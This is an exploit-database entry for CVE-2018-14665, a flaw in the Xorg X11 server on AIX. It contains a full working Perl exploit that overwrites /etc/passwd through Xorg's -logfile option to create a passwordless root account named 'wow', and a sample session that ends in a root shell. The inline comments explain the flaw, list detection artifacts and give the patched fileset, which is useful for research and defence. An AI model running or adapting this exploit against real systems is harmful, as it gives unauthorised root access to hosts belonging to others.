Xorg X11 Server (AIX) - Local Privilege Escalation



EKU-ID: 8194 CVE: 2018-14665 OSVDB-ID:
Author: 0xdono Published: 2018-12-05 Verified: Verified



# Exploit Title: AIX Xorg X11 Server - Local Privilege Escalation
# Date: 29/11/2018
# Exploit Author: @0xdono
# Original Discovery and Exploit: Narendra Shinde
# Vendor Homepage: https://www.x.org/
# Platform: AIX
# Version: X Window System Version 7.1.1
# Fileset: X11.base.rte < 7.1.5.32
# Tested on: AIX 7.1 (6.x to 7.x should be vulnerable)
# CVE: CVE-2018-14665
#
# Explanation:
# Incorrect command-line parameter validation in the Xorg X server can
# lead to privilege elevation and/or arbitrary files overwrite, when the
# X server is running with elevated privileges.
# The -logfile argument can be used to overwrite arbitrary files in the
# file system, due to incorrect checks in the parsing of the option.
#
# This is a port of the OpenBSD X11 Xorg exploit to run on AIX.
# It overwrites /etc/passwd in order to create a new user with root privileges.
# All currently logged in users need to be included when /etc/passwd is overwritten,
# else AIX will throw 'Cannot get "LOGNAME" variable' when attempting to change user.
# The Xorg '-fp' parameter used in the OpenBSD exploit does not work on AIX,
# and is replaced by '-config'.
# ksh93 is used for ANSI-C quoting, and is installed by default on AIX.
#
# IBM has not yet released a patch as of 29/11/2018.
#
# See also:
# https://lists.x.org/archives/xorg-announce/2018-October/002927.html
# https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html
# https://github.com/dzflack/exploits/blob/master/aix/aixxorg.pl
#
# Usage:
#  $ oslevel -s
#  7100-04-00-0000
#  $ Xorg -version
#
#  X Window System Version 7.1.1
#  Release Date: 12 May 2006
#  X Protocol Version 11, Revision 0, Release 7.1.1
#  Build Operating System: AIX IBM
#  Current Operating System: AIX sovma470 1 7 00C3C6F54C00
#  Build Date: 07 July 2006
#          Before reporting problems, check http://wiki.x.org
#          to make sure that you have the latest version.
#  Module Loader present
#  $ id
#  uid=16500(nmyo) gid=1(staff)
#  $ perl aixxorg.pl
#  [+] AIX X11 server local root exploit
#  [-] Checking for Xorg and ksh93
#  [-] Opening /etc/passwd
#  [-] Retrieving currently logged in users
#  [-] Generating Xorg command
#  [-] Opening /tmp/wow.ksh
#  [-] Writing Xorg command to /tmp/wow.ksh
#  [-] Backing up /etc/passwd to /tmp/passwd.backup
#  [-] Making /tmp/wow.ksh executable
#  [-] Executing /tmp/wow.ksh
#  [-] Cleaning up /etc/passwd and removing /tmp/wow.ksh
#  [-] Done
#  [+] 'su wow' for root shell
#  $ su wow
#  # id
#  uid=0(root) gid=0(system)
#  # whoami
#  root
 
#!/usr/bin/perl
# Proof-of-concept for CVE-2018-14665 on AIX, as described in the header above.
# Runs without 'use strict'/'use warnings', so every variable is an implicit
# package global. The '=3D', '=20', '=09' and trailing '=' sequences scattered
# through the listing are quoted-printable residue from the page's transport
# encoding, not part of the script.
# Mitigation (per the header): fileset X11.base.rte 7.1.5.32 closes the issue,
# and the overwrite is only possible while the X server runs with elevated
# privileges.
print "[+] AIX X11 server local root exploit\n";
 
# Check Xorg is in path
# Both lookups shell out via backticks and leave with a bare 'exit' (status 0)
# when the binary is missing, so a caller cannot tell failure from success by
# exit code.
print "[-] Checking for Xorg and ksh93 \n";
chomp($xorg =3D `command -v Xorg`);
if ($xorg eq ""){=20
    print "[X] Can't find Xorg binary, try hardcode it? exiting... \n";
    exit;
}
 
# Check ksh93 is in path
chomp($ksh =3D `command -v ksh93`);
if ($ksh eq ""){
    print "[X] Can't find ksh93 binary, try hardcode it? exiting... \n";
    exit;
}
 
# Read in /etc/passwd
# The open is unchecked: if it fails, @passwd_array stays empty and the
# script carries on with no preserved entries.
print "[-] Opening /etc/passwd \n";
open($passwd_fh, '<', "/etc/passwd");
chomp(@passwd_array =3D <$passwd_fh>);
close($passwd_fh);
 
# Retrieve currently logged in users
# Login names come from 'who' through a shell pipeline; they are used only as
# line prefixes when filtering @passwd_array below.
print "[-] Retrieving currently logged in users \n";
@users =3D `who | cut -d' ' -f1 | sort | uniq`;
chomp(@users);
 
# For all logged in users, add their current passwd entry to string
# that will be used to overwrite passwd
# Note: $user aliases the element of @users, so appending ':' mutates @users
# in place. The single-quoted '\n' is a literal backslash-n (two characters)
# left for ksh93's ANSI-C quoting to interpret later, not for Perl.
$users_logged_in_passwd =3D '';
foreach my $user (@users)
{
    $user .=3D ":";
    foreach my $line (@passwd_array)
    {
        if (index($line, $user) =3D=3D 0) {
            $users_logged_in_passwd =3D $users_logged_in_passwd . '\n' . $l=
ine;
        }
    }
}
 
# Use '-config' as '-fp' (which is used in the original BSD exploit) is not
# written to log
print "[-] Generating Xorg command \n";
$blob =3D '-config ' . '$\'' . $users_logged_in_passwd . '\nwow::0:0::/:/us=
r/bin/ksh\n#' . '\'';
 
# Artifacts this leaves on a host, useful for detection and response: a
# fixed-path /tmp/wow.ksh whose second line runs Xorg with
# '-logfile ../etc/passwd' on display :1, a /tmp/passwd.backup copy that is
# never deleted, and a 'wow' account with uid 0 appended to /etc/passwd.
print "[-] Opening /tmp/wow.ksh \n";=09=09
open($fr, '>', "/tmp/wow.ksh");
 
# Use ksh93 for ANSI-C quoting
print "[-] Writing Xorg command to /tmp/wow.ksh \n";
print $fr '#!' . "$ksh\n";
print $fr "$xorg $blob -logfile ../etc/passwd :1  > /dev/null 2>&1 \n";
close $fr;
 
# Backup passwd
print "[-] Backing up /etc/passwd to /tmp/passwd.backup \n";
system("cp /etc/passwd /tmp/passwd.backup");
 
# Make script executable and run it
# Neither system() return value is checked; the cleanup below runs even if
# the Xorg invocation failed.
print "[-] Making /tmp/wow.ksh executable \n";
system("chmod +x /tmp/wow.ksh");
print "[-] Executing /tmp/wow.ksh \n";
system("/tmp/wow.ksh");
 
# Replace overwritten passwd with: original passwd + wow user
# The wrapper script is removed only if the 'su wow' command succeeds ('&&');
# $result is captured but never inspected.
print "[-] Cleaning up /etc/passwd and removing /tmp/wow.ksh \n";
$result =3D `su wow "-c cp /tmp/passwd.backup /etc/passwd && echo 'wow::0:0=
::/:/usr/bin/ksh' >> /etc/passwd" && rm /tmp/wow.ksh`;
 
print "[-] Done \n";
print "[+] 'su wow' for root shell \n";